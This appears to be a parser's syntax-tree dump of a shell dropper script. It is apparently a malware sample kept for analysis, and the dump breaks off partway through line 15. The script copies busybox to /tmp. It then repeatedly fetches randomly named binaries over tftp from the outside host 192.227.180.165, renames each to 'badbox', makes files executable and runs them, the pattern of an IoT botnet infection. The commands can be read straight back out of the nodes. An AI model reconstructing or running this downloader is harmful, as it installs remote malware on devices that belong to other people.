CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 178), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 138), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 111), word='-r'),
    WordNode(lineno=4, pos=(112, 119), word='vgsfdag'),
    WordNode(lineno=4, pos=(120, 122), word='-g'),
    WordNode(lineno=4, pos=(123, 138), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(138, 139)),
  CommandNode(lineno=4, pos=(139, 158), parts=[
    WordNode(lineno=4, pos=(139, 142), word='cat'),
    WordNode(lineno=4, pos=(143, 150), word='vgsfdag'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(152, 158), word='badbox'), pos=(151, 158), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(158, 159)),
  CommandNode(lineno=4, pos=(159, 169), parts=[
    WordNode(lineno=4, pos=(159, 164), word='chmod'),
    WordNode(lineno=4, pos=(165, 167), word='+x'),
    WordNode(lineno=4, pos=(168, 169), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(169, 170)),
  CommandNode(lineno=4, pos=(170, 178), parts=[
    WordNode(lineno=4, pos=(170, 178), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(179, 302), parts=[
  CommandNode(lineno=5, pos=(179, 186), parts=[
    WordNode(lineno=5, pos=(179, 181), word='cd'),
    WordNode(lineno=5, pos=(182, 186), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(187, 189)),
  CommandNode(lineno=5, pos=(190, 201), parts=[
    WordNode(lineno=5, pos=(190, 192), word='cd'),
    WordNode(lineno=5, pos=(193, 201), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(202, 204)),
  CommandNode(lineno=5, pos=(205, 212), parts=[
    WordNode(lineno=5, pos=(205, 207), word='cd'),
    WordNode(lineno=5, pos=(208, 212), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(213, 215)),
  CommandNode(lineno=5, pos=(216, 224), parts=[
    WordNode(lineno=5, pos=(216, 218), word='cd'),
    WordNode(lineno=5, pos=(219, 224), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(225, 227)),
  CommandNode(lineno=5, pos=(228, 232), parts=[
    WordNode(lineno=5, pos=(228, 230), word='cd'),
    WordNode(lineno=5, pos=(231, 232), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(232, 233)),
  CommandNode(lineno=5, pos=(234, 265), parts=[
    WordNode(lineno=5, pos=(234, 238), word='tftp'),
    WordNode(lineno=5, pos=(239, 241), word='-r'),
    WordNode(lineno=5, pos=(242, 246), word='fdsg'),
    WordNode(lineno=5, pos=(247, 249), word='-g'),
    WordNode(lineno=5, pos=(250, 265), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(265, 266)),
  CommandNode(lineno=5, pos=(266, 282), parts=[
    WordNode(lineno=5, pos=(266, 269), word='cat'),
    WordNode(lineno=5, pos=(270, 274), word='fdsg'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(276, 282), word='badbox'), pos=(275, 282), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(282, 283)),
  CommandNode(lineno=5, pos=(283, 293), parts=[
    WordNode(lineno=5, pos=(283, 288), word='chmod'),
    WordNode(lineno=5, pos=(289, 291), word='+x'),
    WordNode(lineno=5, pos=(292, 293), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(293, 294)),
  CommandNode(lineno=5, pos=(294, 302), parts=[
    WordNode(lineno=5, pos=(294, 302), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(303, 424), parts=[
  CommandNode(lineno=6, pos=(303, 310), parts=[
    WordNode(lineno=6, pos=(303, 305), word='cd'),
    WordNode(lineno=6, pos=(306, 310), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(311, 313)),
  CommandNode(lineno=6, pos=(314, 325), parts=[
    WordNode(lineno=6, pos=(314, 316), word='cd'),
    WordNode(lineno=6, pos=(317, 325), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(326, 328)),
  CommandNode(lineno=6, pos=(329, 336), parts=[
    WordNode(lineno=6, pos=(329, 331), word='cd'),
    WordNode(lineno=6, pos=(332, 336), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(337, 339)),
  CommandNode(lineno=6, pos=(340, 348), parts=[
    WordNode(lineno=6, pos=(340, 342), word='cd'),
    WordNode(lineno=6, pos=(343, 348), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(349, 351)),
  CommandNode(lineno=6, pos=(352, 356), parts=[
    WordNode(lineno=6, pos=(352, 354), word='cd'),
    WordNode(lineno=6, pos=(355, 356), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(356, 357)),
  CommandNode(lineno=6, pos=(358, 388), parts=[
    WordNode(lineno=6, pos=(358, 362), word='tftp'),
    WordNode(lineno=6, pos=(363, 365), word='-r'),
    WordNode(lineno=6, pos=(366, 369), word='sgf'),
    WordNode(lineno=6, pos=(370, 372), word='-g'),
    WordNode(lineno=6, pos=(373, 388), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(388, 389)),
  CommandNode(lineno=6, pos=(389, 404), parts=[
    WordNode(lineno=6, pos=(389, 392), word='cat'),
    WordNode(lineno=6, pos=(393, 396), word='sgf'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(398, 404), word='badbox'), pos=(397, 404), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(404, 405)),
  CommandNode(lineno=6, pos=(405, 415), parts=[
    WordNode(lineno=6, pos=(405, 410), word='chmod'),
    WordNode(lineno=6, pos=(411, 413), word='+x'),
    WordNode(lineno=6, pos=(414, 415), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(415, 416)),
  CommandNode(lineno=6, pos=(416, 424), parts=[
    WordNode(lineno=6, pos=(416, 424), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(425, 546), parts=[
  CommandNode(lineno=7, pos=(425, 432), parts=[
    WordNode(lineno=7, pos=(425, 427), word='cd'),
    WordNode(lineno=7, pos=(428, 432), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(433, 435)),
  CommandNode(lineno=7, pos=(436, 447), parts=[
    WordNode(lineno=7, pos=(436, 438), word='cd'),
    WordNode(lineno=7, pos=(439, 447), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(448, 450)),
  CommandNode(lineno=7, pos=(451, 458), parts=[
    WordNode(lineno=7, pos=(451, 453), word='cd'),
    WordNode(lineno=7, pos=(454, 458), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(459, 461)),
  CommandNode(lineno=7, pos=(462, 470), parts=[
    WordNode(lineno=7, pos=(462, 464), word='cd'),
    WordNode(lineno=7, pos=(465, 470), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(471, 473)),
  CommandNode(lineno=7, pos=(474, 478), parts=[
    WordNode(lineno=7, pos=(474, 476), word='cd'),
    WordNode(lineno=7, pos=(477, 478), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(478, 479)),
  CommandNode(lineno=7, pos=(480, 510), parts=[
    WordNode(lineno=7, pos=(480, 484), word='tftp'),
    WordNode(lineno=7, pos=(485, 487), word='-r'),
    WordNode(lineno=7, pos=(488, 491), word='sfg'),
    WordNode(lineno=7, pos=(492, 494), word='-g'),
    WordNode(lineno=7, pos=(495, 510), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(510, 511)),
  CommandNode(lineno=7, pos=(511, 526), parts=[
    WordNode(lineno=7, pos=(511, 514), word='cat'),
    WordNode(lineno=7, pos=(515, 518), word='sfg'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(520, 526), word='badbox'), pos=(519, 526), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(526, 527)),
  CommandNode(lineno=7, pos=(527, 537), parts=[
    WordNode(lineno=7, pos=(527, 532), word='chmod'),
    WordNode(lineno=7, pos=(533, 535), word='+x'),
    WordNode(lineno=7, pos=(536, 537), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(537, 538)),
  CommandNode(lineno=7, pos=(538, 546), parts=[
    WordNode(lineno=7, pos=(538, 546), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(547, 668), parts=[
  CommandNode(lineno=8, pos=(547, 554), parts=[
    WordNode(lineno=8, pos=(547, 549), word='cd'),
    WordNode(lineno=8, pos=(550, 554), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(555, 557)),
  CommandNode(lineno=8, pos=(558, 569), parts=[
    WordNode(lineno=8, pos=(558, 560), word='cd'),
    WordNode(lineno=8, pos=(561, 569), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(570, 572)),
  CommandNode(lineno=8, pos=(573, 580), parts=[
    WordNode(lineno=8, pos=(573, 575), word='cd'),
    WordNode(lineno=8, pos=(576, 580), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(581, 583)),
  CommandNode(lineno=8, pos=(584, 592), parts=[
    WordNode(lineno=8, pos=(584, 586), word='cd'),
    WordNode(lineno=8, pos=(587, 592), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(593, 595)),
  CommandNode(lineno=8, pos=(596, 600), parts=[
    WordNode(lineno=8, pos=(596, 598), word='cd'),
    WordNode(lineno=8, pos=(599, 600), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(600, 601)),
  CommandNode(lineno=8, pos=(602, 632), parts=[
    WordNode(lineno=8, pos=(602, 606), word='tftp'),
    WordNode(lineno=8, pos=(607, 609), word='-r'),
    WordNode(lineno=8, pos=(610, 613), word='sgf'),
    WordNode(lineno=8, pos=(614, 616), word='-g'),
    WordNode(lineno=8, pos=(617, 632), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(632, 633)),
  CommandNode(lineno=8, pos=(633, 648), parts=[
    WordNode(lineno=8, pos=(633, 636), word='cat'),
    WordNode(lineno=8, pos=(637, 640), word='sgf'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(642, 648), word='badbox'), pos=(641, 648), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(648, 649)),
  CommandNode(lineno=8, pos=(649, 659), parts=[
    WordNode(lineno=8, pos=(649, 654), word='chmod'),
    WordNode(lineno=8, pos=(655, 657), word='+x'),
    WordNode(lineno=8, pos=(658, 659), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(659, 660)),
  CommandNode(lineno=8, pos=(660, 668), parts=[
    WordNode(lineno=8, pos=(660, 668), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(669, 792), parts=[
  CommandNode(lineno=9, pos=(669, 676), parts=[
    WordNode(lineno=9, pos=(669, 671), word='cd'),
    WordNode(lineno=9, pos=(672, 676), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(677, 679)),
  CommandNode(lineno=9, pos=(680, 691), parts=[
    WordNode(lineno=9, pos=(680, 682), word='cd'),
    WordNode(lineno=9, pos=(683, 691), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(692, 694)),
  CommandNode(lineno=9, pos=(695, 702), parts=[
    WordNode(lineno=9, pos=(695, 697), word='cd'),
    WordNode(lineno=9, pos=(698, 702), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(703, 705)),
  CommandNode(lineno=9, pos=(706, 714), parts=[
    WordNode(lineno=9, pos=(706, 708), word='cd'),
    WordNode(lineno=9, pos=(709, 714), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(715, 717)),
  CommandNode(lineno=9, pos=(718, 722), parts=[
    WordNode(lineno=9, pos=(718, 720), word='cd'),
    WordNode(lineno=9, pos=(721, 722), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(722, 723)),
  CommandNode(lineno=9, pos=(724, 755), parts=[
    WordNode(lineno=9, pos=(724, 728), word='tftp'),
    WordNode(lineno=9, pos=(729, 731), word='-r'),
    WordNode(lineno=9, pos=(732, 736), word='sdfg'),
    WordNode(lineno=9, pos=(737, 739), word='-g'),
    WordNode(lineno=9, pos=(740, 755), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(755, 756)),
  CommandNode(lineno=9, pos=(756, 772), parts=[
    WordNode(lineno=9, pos=(756, 759), word='cat'),
    WordNode(lineno=9, pos=(760, 764), word='sdfg'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(766, 772), word='badbox'), pos=(765, 772), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(772, 773)),
  CommandNode(lineno=9, pos=(773, 783), parts=[
    WordNode(lineno=9, pos=(773, 778), word='chmod'),
    WordNode(lineno=9, pos=(779, 781), word='+x'),
    WordNode(lineno=9, pos=(782, 783), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(783, 784)),
  CommandNode(lineno=9, pos=(784, 792), parts=[
    WordNode(lineno=9, pos=(784, 792), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(793, 914), parts=[
  CommandNode(lineno=10, pos=(793, 800), parts=[
    WordNode(lineno=10, pos=(793, 795), word='cd'),
    WordNode(lineno=10, pos=(796, 800), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(801, 803)),
  CommandNode(lineno=10, pos=(804, 815), parts=[
    WordNode(lineno=10, pos=(804, 806), word='cd'),
    WordNode(lineno=10, pos=(807, 815), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(816, 818)),
  CommandNode(lineno=10, pos=(819, 826), parts=[
    WordNode(lineno=10, pos=(819, 821), word='cd'),
    WordNode(lineno=10, pos=(822, 826), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(827, 829)),
  CommandNode(lineno=10, pos=(830, 838), parts=[
    WordNode(lineno=10, pos=(830, 832), word='cd'),
    WordNode(lineno=10, pos=(833, 838), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(839, 841)),
  CommandNode(lineno=10, pos=(842, 846), parts=[
    WordNode(lineno=10, pos=(842, 844), word='cd'),
    WordNode(lineno=10, pos=(845, 846), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(846, 847)),
  CommandNode(lineno=10, pos=(848, 878), parts=[
    WordNode(lineno=10, pos=(848, 852), word='tftp'),
    WordNode(lineno=10, pos=(853, 855), word='-r'),
    WordNode(lineno=10, pos=(856, 859), word='sdf'),
    WordNode(lineno=10, pos=(860, 862), word='-g'),
    WordNode(lineno=10, pos=(863, 878), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(878, 879)),
  CommandNode(lineno=10, pos=(879, 894), parts=[
    WordNode(lineno=10, pos=(879, 882), word='cat'),
    WordNode(lineno=10, pos=(883, 886), word='sdf'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(888, 894), word='badbox'), pos=(887, 894), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(894, 895)),
  CommandNode(lineno=10, pos=(895, 905), parts=[
    WordNode(lineno=10, pos=(895, 900), word='chmod'),
    WordNode(lineno=10, pos=(901, 903), word='+x'),
    WordNode(lineno=10, pos=(904, 905), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(905, 906)),
  CommandNode(lineno=10, pos=(906, 914), parts=[
    WordNode(lineno=10, pos=(906, 914), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(915, 1038), parts=[
  CommandNode(lineno=11, pos=(915, 922), parts=[
    WordNode(lineno=11, pos=(915, 917), word='cd'),
    WordNode(lineno=11, pos=(918, 922), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(923, 925)),
  CommandNode(lineno=11, pos=(926, 937), parts=[
    WordNode(lineno=11, pos=(926, 928), word='cd'),
    WordNode(lineno=11, pos=(929, 937), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(938, 940)),
  CommandNode(lineno=11, pos=(941, 948), parts=[
    WordNode(lineno=11, pos=(941, 943), word='cd'),
    WordNode(lineno=11, pos=(944, 948), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(949, 951)),
  CommandNode(lineno=11, pos=(952, 960), parts=[
    WordNode(lineno=11, pos=(952, 954), word='cd'),
    WordNode(lineno=11, pos=(955, 960), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(961, 963)),
  CommandNode(lineno=11, pos=(964, 968), parts=[
    WordNode(lineno=11, pos=(964, 966), word='cd'),
    WordNode(lineno=11, pos=(967, 968), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(968, 969)),
  CommandNode(lineno=11, pos=(970, 1001), parts=[
    WordNode(lineno=11, pos=(970, 974), word='tftp'),
    WordNode(lineno=11, pos=(975, 977), word='-r'),
    WordNode(lineno=11, pos=(978, 982), word='sgfd'),
    WordNode(lineno=11, pos=(983, 985), word='-g'),
    WordNode(lineno=11, pos=(986, 1001), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1001, 1002)),
  CommandNode(lineno=11, pos=(1002, 1018), parts=[
    WordNode(lineno=11, pos=(1002, 1005), word='cat'),
    WordNode(lineno=11, pos=(1006, 1010), word='sgfd'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1012, 1018), word='badbox'), pos=(1011, 1018), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1018, 1019)),
  CommandNode(lineno=11, pos=(1019, 1029), parts=[
    WordNode(lineno=11, pos=(1019, 1024), word='chmod'),
    WordNode(lineno=11, pos=(1025, 1027), word='+x'),
    WordNode(lineno=11, pos=(1028, 1029), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1029, 1030)),
  CommandNode(lineno=11, pos=(1030, 1038), parts=[
    WordNode(lineno=11, pos=(1030, 1038), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1039, 1164), parts=[
  CommandNode(lineno=12, pos=(1039, 1046), parts=[
    WordNode(lineno=12, pos=(1039, 1041), word='cd'),
    WordNode(lineno=12, pos=(1042, 1046), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1047, 1049)),
  CommandNode(lineno=12, pos=(1050, 1061), parts=[
    WordNode(lineno=12, pos=(1050, 1052), word='cd'),
    WordNode(lineno=12, pos=(1053, 1061), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1062, 1064)),
  CommandNode(lineno=12, pos=(1065, 1072), parts=[
    WordNode(lineno=12, pos=(1065, 1067), word='cd'),
    WordNode(lineno=12, pos=(1068, 1072), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1073, 1075)),
  CommandNode(lineno=12, pos=(1076, 1084), parts=[
    WordNode(lineno=12, pos=(1076, 1078), word='cd'),
    WordNode(lineno=12, pos=(1079, 1084), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1085, 1087)),
  CommandNode(lineno=12, pos=(1088, 1092), parts=[
    WordNode(lineno=12, pos=(1088, 1090), word='cd'),
    WordNode(lineno=12, pos=(1091, 1092), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1092, 1093)),
  CommandNode(lineno=12, pos=(1094, 1126), parts=[
    WordNode(lineno=12, pos=(1094, 1098), word='tftp'),
    WordNode(lineno=12, pos=(1099, 1101), word='-r'),
    WordNode(lineno=12, pos=(1102, 1107), word='fghjd'),
    WordNode(lineno=12, pos=(1108, 1110), word='-g'),
    WordNode(lineno=12, pos=(1111, 1126), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1126, 1127)),
  CommandNode(lineno=12, pos=(1127, 1144), parts=[
    WordNode(lineno=12, pos=(1127, 1130), word='cat'),
    WordNode(lineno=12, pos=(1131, 1136), word='fghjd'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1138, 1144), word='badbox'), pos=(1137, 1144), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1144, 1145)),
  CommandNode(lineno=12, pos=(1145, 1155), parts=[
    WordNode(lineno=12, pos=(1145, 1150), word='chmod'),
    WordNode(lineno=12, pos=(1151, 1153), word='+x'),
    WordNode(lineno=12, pos=(1154, 1155), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1155, 1156)),
  CommandNode(lineno=12, pos=(1156, 1164), parts=[
    WordNode(lineno=12, pos=(1156, 1164), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1165, 1300), parts=[
  CommandNode(lineno=13, pos=(1165, 1172), parts=[
    WordNode(lineno=13, pos=(1165, 1167), word='cd'),
    WordNode(lineno=13, pos=(1168, 1172), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1173, 1175)),
  CommandNode(lineno=13, pos=(1176, 1187), parts=[
    WordNode(lineno=13, pos=(1176, 1178), word='cd'),
    WordNode(lineno=13, pos=(1179, 1187), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1188, 1190)),
  CommandNode(lineno=13, pos=(1191, 1198), parts=[
    WordNode(lineno=13, pos=(1191, 1193), word='cd'),
    WordNode(lineno=13, pos=(1194, 1198), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1199, 1201)),
  CommandNode(lineno=13, pos=(1202, 1210), parts=[
    WordNode(lineno=13, pos=(1202, 1204), word='cd'),
    WordNode(lineno=13, pos=(1205, 1210), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1211, 1213)),
  CommandNode(lineno=13, pos=(1214, 1218), parts=[
    WordNode(lineno=13, pos=(1214, 1216), word='cd'),
    WordNode(lineno=13, pos=(1217, 1218), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1218, 1219)),
  CommandNode(lineno=13, pos=(1220, 1257), parts=[
    WordNode(lineno=13, pos=(1220, 1224), word='tftp'),
    WordNode(lineno=13, pos=(1225, 1227), word='-r'),
    WordNode(lineno=13, pos=(1228, 1238), word='gfjfdjdjfd'),
    WordNode(lineno=13, pos=(1239, 1241), word='-g'),
    WordNode(lineno=13, pos=(1242, 1257), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1257, 1258)),
  CommandNode(lineno=13, pos=(1258, 1280), parts=[
    WordNode(lineno=13, pos=(1258, 1261), word='cat'),
    WordNode(lineno=13, pos=(1262, 1272), word='gfjfdjdjfd'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1274, 1280), word='badbox'), pos=(1273, 1280), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1280, 1281)),
  CommandNode(lineno=13, pos=(1281, 1291), parts=[
    WordNode(lineno=13, pos=(1281, 1286), word='chmod'),
    WordNode(lineno=13, pos=(1287, 1289), word='+x'),
    WordNode(lineno=13, pos=(1290, 1291), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1291, 1292)),
  CommandNode(lineno=13, pos=(1292, 1300), parts=[
    WordNode(lineno=13, pos=(1292, 1300), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1301, 1442), parts=[
  CommandNode(lineno=14, pos=(1301, 1308), parts=[
    WordNode(lineno=14, pos=(1301, 1303), word='cd'),
    WordNode(lineno=14, pos=(1304, 1308), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1309, 1311)),
  CommandNode(lineno=14, pos=(1312, 1323), parts=[
    WordNode(lineno=14, pos=(1312, 1314), word='cd'),
    WordNode(lineno=14, pos=(1315, 1323), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1324, 1326)),
  CommandNode(lineno=14, pos=(1327, 1334), parts=[
    WordNode(lineno=14, pos=(1327, 1329), word='cd'),
    WordNode(lineno=14, pos=(1330, 1334), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1335, 1337)),
  CommandNode(lineno=14, pos=(1338, 1346), parts=[
    WordNode(lineno=14, pos=(1338, 1340), word='cd'),
    WordNode(lineno=14, pos=(1341, 1346), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1347, 1349)),
  CommandNode(lineno=14, pos=(1350, 1354), parts=[
    WordNode(lineno=14, pos=(1350, 1352), word='cd'),
    WordNode(lineno=14, pos=(1353, 1354), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1354, 1355)),
  CommandNode(lineno=14, pos=(1356, 1396), parts=[
    WordNode(lineno=14, pos=(1356, 1360), word='tftp'),
    WordNode(lineno=14, pos=(1361, 1363), word='-r'),
    WordNode(lineno=14, pos=(1364, 1377), word='[dfjdfjgfdjf]'),
    WordNode(lineno=14, pos=(1378, 1380), word='-g'),
    WordNode(lineno=14, pos=(1381, 1396), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1396, 1397)),
  CommandNode(lineno=14, pos=(1397, 1422), parts=[
    WordNode(lineno=14, pos=(1397, 1400), word='cat'),
    WordNode(lineno=14, pos=(1401, 1414), word='[dfjdfjgfdjf]'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1416, 1422), word='badbox'), pos=(1415, 1422), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1422, 1423)),
  CommandNode(lineno=14, pos=(1423, 1433), parts=[
    WordNode(lineno=14, pos=(1423, 1428), word='chmod'),
    WordNode(lineno=14, pos=(1429, 1431), word='+x'),
    WordNode(lineno=14, pos=(1432, 1433), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1433, 1434)),
  CommandNode(lineno=14, pos=(1434, 1442), parts=[
    WordNode(lineno=14, pos=(1434, 1442), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1443, 1574), parts=[
  CommandNode(lineno=15, pos=(1443, 1450), parts=[
    WordNode(lineno=15, pos=(1443, 1445), word='cd'),
    WordNode(lineno=15, pos=(1446, 1450), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1451, 1453)),
  CommandNode(lineno=15, pos=(1454, 1465), parts=[
    WordNode(lineno=15, pos=(1454, 1456), word='cd'),
    WordNode(lineno=15, pos=(1457, 1465), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1466, 1468)),
  CommandNode(lineno=15, pos=(1469, 1476), parts=[
    WordNode(lineno=15, pos=(1469, 1471), word='cd'),
    WordNode(lineno=15, pos=(1472, 1476), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1477, 1479)),
  CommandNode(lineno=15, pos=(1480, 1488), parts=[
    WordNode(lineno=15, pos=(1480, 1482), word='cd'),
    WordNode(lineno=15, pos=(1483, 1488), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1489, 1491)),
  CommandNode(lineno=15, pos=(1492, 1496), parts=[
    WordNode(lineno=15, pos=(1492, 1494), word='cd'),
    WordNode(lineno=15, pos=(1495, 1496), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1496, 1497)),
  CommandNode(lineno=15, pos=(1498, 1533), parts=[
    WordNode(lineno=15, pos=(1498, 1502), word='tftp'),
    WordNode(lineno=15, pos=(1503, 1505), word='-r'),
    WordNode(lineno=15, pos=(1506, 1514), word='fjdfdfdj'),
    WordNode(lineno=15, pos=(1515, 1517), word='-g'),
    WordNode(lineno=15, pos=(1518, 1533), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1533, 1534)),
  CommandNode(lineno=15, pos=(1534, 1554), parts=[
    WordNode(lineno=15, pos=(1534, 1537), word='cat'),
    WordNode(lineno=15, pos=(1538, 1546), word='fjdfdfdj'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1548, 1554), word='badbox'), pos=(1547, 1554), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1554, 1555)),
  CommandNode(lineno=15, pos=(1555, 1565), parts=[
